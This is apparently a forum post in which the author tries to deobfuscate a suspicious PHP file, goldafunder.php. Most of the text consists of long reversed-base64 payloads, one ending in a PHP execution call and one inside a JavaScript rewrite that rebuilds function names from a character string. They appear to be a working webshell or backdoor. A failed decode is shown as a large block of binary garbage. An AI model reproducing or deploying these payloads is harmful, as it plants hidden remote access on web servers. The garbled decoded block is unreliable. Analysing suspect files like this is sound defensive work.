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")));$HTIRyzRYNNT();?>
Now, to me, that last line looks like it contains some base64 string.
Upon decoding the last large base64 string ("K0...QC"), I got a binary (maybe).
+D+H7E�+L�Q����ԑ�����U�&��@����^�ٜ��]�Տ�
ؓ�ԑ��
ܧ�&�+L��ۗU�+D&H6�ݦ�텝�����T&��T&��@����^�ٜ��]�Տ�
ؓ�ԑ��
ܧ�&D+L��ۗU�&H6�ʅQɲH���ɡA��ٛ�����˘����ɘ����Q����������@��QɡA��ٛ�����˘��Iɋ����ۡ����������Y��������D��Y����ݘ�Q��]݄�ˋD��Y����� ���ޖщ�A��ٛ�����˘��ś������������Ø��؛�U����Ȏ�ݠ���]�}]������Տ�ə�]��]�}]������щ�������ڲT&H6�ʧIH�ݛ��ڊ�[��������ܦ��U�&H6�ȥM�����U�&��T+H6�+D&D+L�Q����ԑ�����U�&D+H7E�&D+L�
ܔ�ɰ
ٔ�ɰ�ںQ���ԑ��ٝY�}]��וٛ�������&D&��IH��\������������ٛ��&D&H6���
ܔ���̜�Ԋ�\�OsQ���ˣ̉�
ٔ��&D&H6��D��Y����Y���������Yؒ���ՙ��Y�Q�}]��Q��X�ԑ�&D&H6�M��ٛ��oٙ�Q���ںQ��D&D+L�D��Y���ɧ؏p]�s�����
O���pQ�s܉�M����&D&H6�ʤ���ڽޕȱ
ؒ�����ܠ��T&H6��@����^�ٜ��]�Տ�
ؓ�ԑ��
ܧ�&D+H6�����T&��T&H6�ݦ��A����Q����ՙ&D&H6��T&D+D&D&D+L�A����Q����Q����������R:Q}Q$�S%X��M���������A����Q��D&D&H6�ʯ�����@ȥ��Q��ٛ����ϕ�����U��ٙ&D&D+D+L�A����Q���� ���ޖщ�E��Ȱ��������M�������ܰ������U٭X��M���������A����Q��D&D&��D��Q��U�������U٬՝��� ���ޖݘ�X��M���������A����Q��D&D&��D��Q��U����՚���ݜ������՚���ݜ�����Q��Y�|���T��Q��U���&D&H6�ʕذەɱA��Q����A��Q���������\��ϕذە�&D&D+L�A����Q�����Q����ޕɊ��Q��Y�|���T��Q��U���&D&H6�����T&D+D&D&D+L�A����Q�����Y����U����Q��Y�|���T��Q��U���&D&D+L����Ƀ�ςɜ�Q���IH˙�oٙ�Q��
��Y����&D&H6�ʦD���ۊ�[�������܇�\���D�t�����������]��Q����T&D+L��ۗU�&D+L�Q���ݹQ��ݘ�ݛ�����T&D+L�ޕɡA��ՙ��M�M����ӕ�ӝ���۽�&D&H6�ʧIH����Q��Q�̜�������]��Q����&D&�+L�D���۽����������]��Q����&D+H7E��@���ɠ�ِU��X��DȰY�����ʰY���������������Q��Q��ɢ
��Y�����A��ݹQ��ݘ���H�A����U��Q����D��A��ݹQ��ݘ��[������ݘ��ф��Y�T��Q�ӕ�ӝ����D��A��ݹQ��ݘ��[��������ܦ��U�&H6�ȥ
ۉ����&H6��ںQ�}Q���ۤ���������ںQ�}Q���ۥ�� ���ޖщ����ݝ�Uϐ���U٬՝�����ܤ���Q���[�����՚���ݜ���IH����oٙ�Q�Tٱ���t���Q���[��������t���Y���[������؉�t���Q�Yoٙ�Q�\ڌQ�Q �IH����U٬�������� ���ޖщ&H6�ʥ�������Q�}͔�؊��Q��Y�����\ۛ����ʙ���۰ٙ�ʥ����ݕٙ�����������������U�͑��H�Ȑ��������ٙXْ�ʧ��Q���ӕ�ӝ���]�ݗ���
���Q�}͔�؈�ذە�&H6�̯A^�U͓Q�m���Hٛщ&H6���
ۉ��E�����M��Q���������Q��Y���ː��U��ݖY���܀�����ݛ�џ�њ�Q��٘�ْQ��ٲY��U�٘���ݑ��ܗ���Q��Q��Q���ݑ�
���ܗ���شM��ٱݛ�݈����ط�Y��ܠ��T+L�D������������M�����ћ䕘�ۼًqY��՞����ۼًr��U�̕��U��]�����ݝ�ٻ���Q��Q��ۼًq����џ�њ�Qߠٜ�]��Q��Y��ۇۼًs��ۼًrݜ�ۼًs���ۼًqٛ������ݙ����ѝ�]��Y����U�&��IHI�QS��Hl�QX�QO�IPܦUے��QIY�WAU ��IYI]}������t��9]�T�U|URl�QX�QO�IT����D����@ݼ��&H6�ʧA^�U͓Q�m�������ܤ
���&�&��X6�ʦL��Y��ݘ��ӕ�ӝ���]�ݗ���
���Q�}͔�؈
��ڰU��]��Q�����D+L�L��Y��ݘ������]����
���&��@��Y��U��щ&�+L��ۗY�6�+D&�+L�Q��T+H6�ʥݽ���ڰU��]��A��ٛ��M�M�������T+L�D&D+@���@��U�������Q�������ەɡA�����Q��@ȝI���ח���Y�Q��U��Ԃ&D&H7����ȥ ����]������@�������\���������Y�Y�|���D&D&���٥���щ��ρę�Y��Y��ݘ�D&D&���W�W��ρę�Y��D&D&���QX�QO�I��ρȜ��ܔ��&D&D+@�щ��ρș�Ԃ&D&H6���܇P��щ&H6��T+L�D��՚������ەۼݗ�]�}Q�����A��ՙ��M�M�����I������ϕ�Xٍ�&H6�ʤ�٥���щ����Q���Y�Y���U�&��@��Y��U��щ&H6�ʉH��@ޒ���U�+D&����]�����̈]K��̈���ՙ&H6�ʉ��@ޒ���U�+H6��X6�ݦ�&H6�ȻH���PU�̈���ՙ&H6��Ņ����ەɠ�ݹQ��ݘ}���Y�Y��ʉ������]��U�����ȸ�ݒ���ݗ���^���ɰH�ԑ��
ܧ�&��D��Yؓ�����ەۼݗ�Q�}Q�����H��ڸ�ۼ՚�ٴ���Qɡٟ�Y�Q�~Q��]�T���Ņ�����ڲT+L�H�ԑ���٥���щ��ݹQ��ݘ}���Y�Y��ʉɛÔ�����Y���ݒ���ݗ���^���ɰH�ԑ��
ܧ�&�쌋����њ�������ٜU��؈����]����̋�����ݒD+L����̈MQ%��PQA]H�Ȉ����U�&��X�Ȅ��ɠ��X6��T�����Pٵ��ɡ������@�������+H6�ʦH�����Y�}ٞ��ݘ��ф��Y���U�������ɠ���숈��+H6�ʋD�E�����Q��\]���X���ݘ��ф��Y�����]���6�+L�ē������ڶQ�~YܿU��Њ�]�~Y��6�숙�ً���U����
���Q��Q��@��U���6�Ȝڸ�ۼ՚�ٴ�����������+L���щ���ܵ���٥���щ+H6��@��Q��Q����������������������6���숋�@��Q��Q��H6�������@�����X��]�Տ������+L�D��Y��������������Q���Y�Y��P����+H6�ȟ���Dګ՛������щ+H6�ȼ����ۡPٵ�����D͓Q���+H6���ݒ��U���������Qɹ
ܾ�� ����
ܾ��@ٷP��њ�����@��њ�������ܐ������\�����ۡ�6�IW�UMUEY��T�T�W���ݒ��D��
T>AU ��IYI]}�����ћ�������ۡ�6�수�٘Q��D̔�D�������������E��������Pٵ�6��H��ՙ�ݗ������Y�}ٟPޒ�숈� ەۼщ+H6�+H7I�6�숋���Qݔ��+H6�ܥ��Q����Qݔ�ȦH����Q�������Y���\�����Q�|����Q�|�ڠ��X6�ʠ�ړ�\�Q�}ٟ�\��������Q��H6��L������������ȋ������Y���\���U�+H6���Q�}۔���щ��ڑ]���&��H������Qݔ�ȦH����A��Q����|�ځ���H�����ړ�\�����Q����������{܉�
��U�}ՙ�Ƞ�����ړ�]�Y��]ؒ����Y��@��Q���������+L�ȋ�����ۃ@��Q�}۔���щ&�+L�����Qݔ�Ȧ@�������Y���\�������Q�|�ڠ������Q�̕ړ�]�UؙQ�������ۚX6��D�+L �����Н�Q��ݘ�
ݞD+@���Ԃ&��̜�]�����ڽM��Yۥ�̝��Q��Ԙ���Ԃ&��ę�U�����Л�ڼ�ۏܜ�Y���ا�&H7��]��U���ݖY��E��U�]��ܜӕ��ќ�ݘ����Y���ںU��]�&H7��U��ɛ��K�U��]��ܜ�]���� ەۼՋ���&H7�ϕ��Q��ԙ�U��Q���ڼ�ّQۏ���
ݞD+@� ەۼ��Q����]���ّQۏ���
ݞD+@
�Y��Q����Q�}��Y���&�+D&��@��Q�|ە��]�|�����Qݔ��&��T����ܐ�O�B����Y���ʁ��&�+L����Q�|��}ٜ��Q������+D+H6���щ������Y��Q�����Y�&��X6�ʋ ��ޗ����۾Q��ݛ0���Q��Q�&H6�ʈ��� ��ޗ�����X7E�+L������A���ӕ�ӝ����Q��Q�&H6�ʈ���
ؒ���U�+H6��D��@������Q��@ٶ������ˈ�bUPKX�P��������U��ɠ��X6�ʈ���Q�������Q�L���Q��Q�����L�����ʁ��&��MI����\�ڞ�[���}ٟ�Y�Q�~Q��]ؐ�Q݅ܒH6�ן ���]�Y����ܖ�����]�ݗ���^��ݍ�� ��ޗ��&��MI����]�Q��ݘ��[���}ٟ�Y�Q�~Q��]ؐ�щ&�+L� �ԝؒ���ݗ���^��ݏTʽ����]�ݗ���^��ݍ��Yؒ���Q�&��MI$�U}TUT�Il�QX�QO�I���
T>AU!ܖIYI]}������ܓ@��Y܍�+L�̋������ȟ̋����ڜ��E����DςL������MI3�=SHWIYI]��T�T�W�
�ќ����\��ٜ��+D&��T��������Q�~Q��}ٜ��Q������+D+L�ə�]��]�}]������щ��������Y��Q�����Y�&��@�����۰ݗ��ݎX6��@�������ٟ�[�]��ə�]��]�}]������щ&��@����ř�]�����������+L� ە�]���� S�I]W�UC�I]P������ܽ���[�]�&��@����O�e�IYO�UC�I]P������ܽ���[�]�&��@���Qe�IYO�UC�I]P������ܽ���[�]�&��@��̃��W�6Q}T?T��
�������]���Ղ+L�@Ȱ�Q�S�U8�UQY}T?T��
�������]���Ղ+L� ���0�U}T?T��
�������]���Ղ+L����Y���[�]@Ƞщ&��X������;I����L�Ĉ��L�ǀ��ͽE������ݘ���՚��3Q"�
��̹���������Y���рނ��ۅ�\�À����8��љ�]�����Lˇ����4��ӕ��Y���ݓ���Qɡٟ�Y�Q�~Q��]���عY�+H6�+H7I�6�ٜQ����Qݔ��+@���+@���+D&��D����Q������ɻH���ӕ��Q������H���؏rQټ��s�������Y��܃@ȕ��&�숏�Џ������U������������&��L���������s�܋ȡA����Q����ӕ��Q����������H6���ψ�� ۗU��Q���������+L�Ϥ�ںQ�����]ێ��U�+D��������6���������ɛ������������̋���L����� ۗU��Q��A��U�}ՙ�ȸ���������Y��܃@ȕ��&��L�ӕ��Q���ѕ�����Y��Q�����U����D+L��ںQ�����Q���^��܄��ɛ��&H6�Ȧ̊���A���ȥ����������ٙ��������6��D��ۗU��Q�� ��ݘ�L������ӕ��ъ�U��A�&�+H7E�+L��ݹU������Uڹ]��Y��Q���ӕ��Q���&��M\���m��������ӕ��Q���&�����������M��Ƀ���ɣ���Z�ط�Y��ܠ��X6�ʢE�ȕ@��ۗU��Q�&�+L������Y���������M��ɢٝY�}]��וٛ������عY�+H7I�6�ؐ��Qݔ��+L����EJ�A�����ݽ���ˋ�TQR��Z���vP����Q��]�Б�Ϙ�|URnQ�����ڢ�ؐ�����IH�A���Z�����ܧTؒH6��IYI]}�]?�}�P�QTUQK�I�M��U�~U�ȕ�TڒH6���A�����]�ш�՚�ٛՙ�6��@��ڶQ�}U����]�+H4��&�+D+D*���
I must now attempt to deobfuscate goldafunder.php
to bring meaning to the base64 encoded text.
After transforming the original php file into a somewhat javascript:
var randomText="3K4hbIR80HU_5VL1MzAqr6GgewJPjOsC9f7uFYnixvSydaNTkDX2ctlZpomQWEB"; var firstText=randomText[4] +randomText[45]+ randomText[30]+ randomText[24]+ randomText[21] +randomText[2] +randomText[11] +randomText[44] +randomText[24]+
randomText[52]+ randomText[57] +randomText[44]+randomText[24]; var secondText=randomText[30]+ randomText[53]+ randomText[20] +randomText[20]+ randomText[24] +randomText[41]; var thirdText=randomText[24]+
randomText[20] +randomText[20] + randomText[57]+
randomText[20]+ randomText[11]+randomText[20]+randomText[24]+ randomText[56] +randomText[57] +randomText[20]+ randomText[53] +randomText[39] +randomText[38]+ randomText[23]; var fourthText=randomText[52] +randomText[20]+
randomText[24] +randomText[45] + randomText[53] +randomText[24] +randomText[11]+ randomText[33] +randomText[35] + randomText[38]+ randomText[52]+ randomText[53]+randomText[39] +randomText[57]+randomText[38];thirdText(0); var fifthText=fourthText("",firstText(secondText("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